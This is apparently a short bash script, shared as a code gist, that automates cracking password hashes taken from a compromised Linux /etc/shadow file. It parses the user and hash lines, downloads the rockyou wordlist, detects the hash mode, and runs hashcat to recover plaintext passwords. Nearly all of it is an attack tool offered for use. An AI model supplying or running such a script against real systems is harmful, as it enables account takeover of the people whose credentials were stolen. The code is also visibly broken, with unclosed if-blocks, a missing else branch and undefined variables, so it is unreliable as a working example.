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Created December 17, 2020 06:44
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Found an /etc/shadow file but don't feel like learning hashcat? Pwn it in no time with this 1337 $cr!p7
if [[ $# -eq 0 ]]; then
echo "Usage:"
echo "Provide compromised /etc/shadow file as command line argument."
echo "And make sure you have read permissions on it."
echo " e.g. $0 shadow.txt"
exit 1
main() { # $1 is compromised /etc/shadow file
if [ -e "$wordlistFile" ]; then
echo "Found rockyou.txt"
echo "Downloading rockyou.txt"
curl -s -L "$rockyouURL" -o "$wordlistFile"
# grep compromised /etc/shadow file for hashes
hashLines=$(grep -P '^[^:]+:\$\d\w?\$[^:]+:.*$' "$1") # lines that contain hashes from compromised /etc/shadow file
# scrub hash file
truncate -s 0 "$hashFile"
mode="1800" # default to standard Linux SHA-512 Crypt
for line in $hashLines; do
user=$(echo "$line" | cut -d':' -f1)
hash=$(echo "$line" | cut -d':' -f2)
echo "$user:$hash" >> "$hashFile"
mode=$(hashid -m "$hash" | grep -oP '\[Hashcat Mode: \d+' | cut -c 16-)
# execute hashcat
# scrub results file
truncate -s 0 "$resultsFile"
# first run - crack everything ya can
hashcat -m "$mode" -a 0 --username "$hashFile" "$wordlistFile" -O --force
# second run - display any cracked results nicely
hashcat -m "$mode" --show --username --outfile-format 3 --outfile "$resultsFile" "$hashFile"
echo "Results written to $resultsFile"
main $*
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